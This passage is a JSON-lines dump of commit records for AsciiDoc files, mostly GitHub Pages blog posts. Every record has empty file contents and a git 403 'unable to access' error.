2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d29a9704b75c451c76d0d9b9163b49788a821b","subject":"added travis badge to readme","message":"added travis badge to readme","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c64592d0b363dbba2d5494fa06ee3340210cb556","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c1ed8166c76f42912639e9802396dec205881d","subject":"Update 2017-12-05-Docker.adoc","message":"Update 2017-12-05-Docker.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2017-12-05-Docker.adoc","new_file":"_posts\/2017-12-05-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e7f835c9fd00dc2f2296cc6221bade909dd9fb5","subject":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","message":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d1aa219dd3e7a8d350be9b3677b738c91a27ed9","subject":"y2b create post What's Hidden In This Hoodie?","message":"y2b create post What's Hidden In This 
Hoodie?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-23-Whats-Hidden-In-This-Hoodie.adoc","new_file":"_posts\/2016-12-23-Whats-Hidden-In-This-Hoodie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a23e58d361335b2f9ff1fe3dd60be390e831ce36","subject":"y2b create post PlayStation VR Unboxing + Demo","message":"y2b create post PlayStation VR Unboxing + Demo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-14-PlayStation-VR-Unboxing--Demo.adoc","new_file":"_posts\/2016-10-14-PlayStation-VR-Unboxing--Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f36c2bbae05b689ab60d237701a846305afd2092","subject":"y2b create post FINAL PICK YOUR PRIZE UPDATE!","message":"y2b create post FINAL PICK YOUR PRIZE UPDATE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-15-FINAL-PICK-YOUR-PRIZE-UPDATE.adoc","new_file":"_posts\/2011-09-15-FINAL-PICK-YOUR-PRIZE-UPDATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a18d9b0aafac6b7e79026f90cdc04234393ba09","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bc5916b90d7772397e4ec7626f3e7271f20fbfd","subject":"much needed upgrade to API doc","message":"much needed upgrade to API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"f054095d52c85ee4275a5eb0d884338821060682","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea6a8e3991db33eee977f209cc4614b83646bde2","subject":"Publish 
0093-1-1-Puzzle-8-Matrix.adoc","message":"Publish 0093-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"0093-1-1-Puzzle-8-Matrix.adoc","new_file":"0093-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cc7a9a3439a30d68cad6bb4f446845efc4ea7d8","subject":"Update 2016-04-06-Backups.adoc","message":"Update 2016-04-06-Backups.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Backups.adoc","new_file":"_posts\/2016-04-06-Backups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bfc891671fc2653e9f7fb3811617523cd94198d","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82c1aa77e64c610f6b2ac0666ae5435f5f79fa40","subject":"Fix a link in the user guide","message":"Fix a link in the user guide\n","repos":"K2InformaticsGmbH\/ranch,layerhq\/ranch,ninenines\/ranch","old_file":"doc\/src\/guide\/ssl_auth.asciidoc","new_file":"doc\/src\/guide\/ssl_auth.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ninenines\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"f3d9d2ec3d1aaf8c21d9353f4022e627a8c9207f","subject":"Update 2015-11-11-Evolve-further.adoc","message":"Update 2015-11-11-Evolve-further.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-11-Evolve-further.adoc","new_file":"_posts\/2015-11-11-Evolve-further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fed568328cead814e43eea2652bcb0ae0a1d1de","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/208","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/208\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1d9d98295fc46d9528295803afa6a6c4c3c3b38","subject":"y2b create post Nintendo Wii U Deluxe Set Unboxing","message":"y2b create post Nintendo Wii U Deluxe Set Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-15-Nintendo-Wii-U-Deluxe-Set-Unboxing.adoc","new_file":"_posts\/2012-12-15-Nintendo-Wii-U-Deluxe-Set-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68a9de3c63ee685021ee8280b37f4e4242b1dfac","subject":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","message":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11334360991053b28fd93f7e2cbd66b985ba9db6","subject":"Add documentation","message":"Add documentation\n","repos":"Kronos-Integration\/kronos-step","old_file":"doc\/step-interface.adoc","new_file":"doc\/step-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-step.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a544fe659998ce665798de0d5022f631ea10f760","subject":"Update 2015-05-06-Test.adoc","message":"Update 2015-05-06-Test.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-06-Test.adoc","new_file":"_posts\/2015-05-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d371418ef34805f14abdceba32852380b45292a7","subject":"Update 2015-09-25-Test.adoc","message":"Update 2015-09-25-Test.adoc","repos":"StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io","old_file":"_posts\/2015-09-25-Test.adoc","new_file":"_posts\/2015-09-25-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/StefanBertels\/stefanbertels.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f7876c04cf39978c8891fd9587cae7f97683473","subject":"Update 2015-12-28-Test.adoc","message":"Update 2015-12-28-Test.adoc","repos":"AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com","old_file":"_posts\/2015-12-28-Test.adoc","new_file":"_posts\/2015-12-28-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/AirHacX\/blog.airhacx.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dd54db595ec62c27a83b49a7463867007a76a72","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8caabd581d42289693fdaccaf2752f71a153229e","subject":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b248196384272b7980620a9bbd5ed3e9176030e","subject":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a661d0951f0032abda47bd06faedad13286d71","subject":"add symlink instead","message":"add symlink instead\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"807ca956b15b398610722d959f56af9f387e03ce","subject":"Updated feature table","message":"Updated feature table\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05172538e931e4f854b9eb4f24684c21210c7d74","subject":"Deleted _posts\/2017-02-02-Not-Clear.adoc","message":"Deleted 
_posts\/2017-02-02-Not-Clear.adoc","repos":"tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io","old_file":"_posts\/2017-02-02-Not-Clear.adoc","new_file":"_posts\/2017-02-02-Not-Clear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tofusoul\/tofusoul.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1e13084fbb6279cf559090684d051a8a1de4535","subject":"Update 2019-03-16-Cirq.adoc","message":"Update 2019-03-16-Cirq.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-16-Cirq.adoc","new_file":"_posts\/2019-03-16-Cirq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e33ef3fc4287d43a80273670bd1627e85c5fcc","subject":"Update 2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","message":"Update 2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","new_file":"_posts\/2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efa0c02c9c03fe60b10bfd71b93df326071f80d1","subject":"SWARM-1235: Better document logging category name delineation. (#479)","message":"SWARM-1235: Better document logging category name delineation. 
(#479)\n\nMotivation\r\n----------\r\nDocs were unclear on using [ ] around logging category names.\r\n\r\nModifications\r\n-------------\r\nAdded some docs.\r\n\r\nResult\r\n------\r\nStuff is documented.","repos":"heiko-braun\/wildfly-swarm-1,gastaldi\/wildfly-swarm,kenfinnigan\/wildfly-swarm,gastaldi\/wildfly-swarm,juangon\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,heiko-braun\/wildfly-swarm-1,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,jamezp\/wildfly-swarm,kenfinnigan\/wildfly-swarm,heiko-braun\/wildfly-swarm-1,heiko-braun\/wildfly-swarm-1,jamezp\/wildfly-swarm,gastaldi\/wildfly-swarm,gastaldi\/wildfly-swarm,juangon\/wildfly-swarm,jamezp\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,heiko-braun\/wildfly-swarm-1,jamezp\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,gastaldi\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,jamezp\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm","old_file":"fractions\/wildfly\/logging\/README.adoc","new_file":"fractions\/wildfly\/logging\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72c7f40ab74f0fae3d76a6dccba29498f76742a2","subject":"Update 2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","message":"Update 2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","new_file":"_posts\/2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c3bce0f0bf1c062aa3f377f06b1d2a22c88b0bd","subject":"Update 2017-XX-XX-Using-J-Rby-on-Windows.adoc","message":"Update 2017-XX-XX-Using-J-Rby-on-Windows.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Using-J-Rby-on-Windows.adoc","new_file":"_posts\/2017-XX-XX-Using-J-Rby-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbc76253b933b5616f2d183883d61a41be3188af","subject":"Update 2015-07-22-Piyo.adoc","message":"Update 2015-07-22-Piyo.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Piyo.adoc","new_file":"_posts\/2015-07-22-Piyo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"89a6d99c0e2feac9e290d7ce35b9b9300f573062","subject":"Update 2016-03-17-Goss.adoc","message":"Update 2016-03-17-Goss.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-17-Goss.adoc","new_file":"_posts\/2016-03-17-Goss.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa62e10a24b6a86b22f65eeab1be613cbee446d2","subject":"Update 2016-07-29-TEST.adoc","message":"Update 2016-07-29-TEST.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-TEST.adoc","new_file":"_posts\/2016-07-29-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd5a5d59e4ba50bbc94e36d7c202958946538f67","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31eeb162a96ce373915a7a74c07b899904a36c50","subject":"Initial draft of automatic provisioning documentation","message":"Initial draft of automatic provisioning documentation\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/automatic-provisioning.adoc","new_file":"docs\/automatic-provisioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"9e535803092e5c77a6f09204aa10a59fa6b391df","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d945e1aa18f8bf8962f32c797cb8cb875e1698f","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 
2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21c598acfcf262185d3b1f1ac3a79f836fa61d49","subject":"Update 2018-04-03-Blockchain-Design-considerations.adoc","message":"Update 2018-04-03-Blockchain-Design-considerations.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-03-Blockchain-Design-considerations.adoc","new_file":"_posts\/2018-04-03-Blockchain-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d705fde3d58542b3116d75bedcfa13976d9603a","subject":"Update 2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","message":"Update 2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","new_file":"_posts\/2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c7fad9b9640061a45eb03eac6eadff94f19262","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 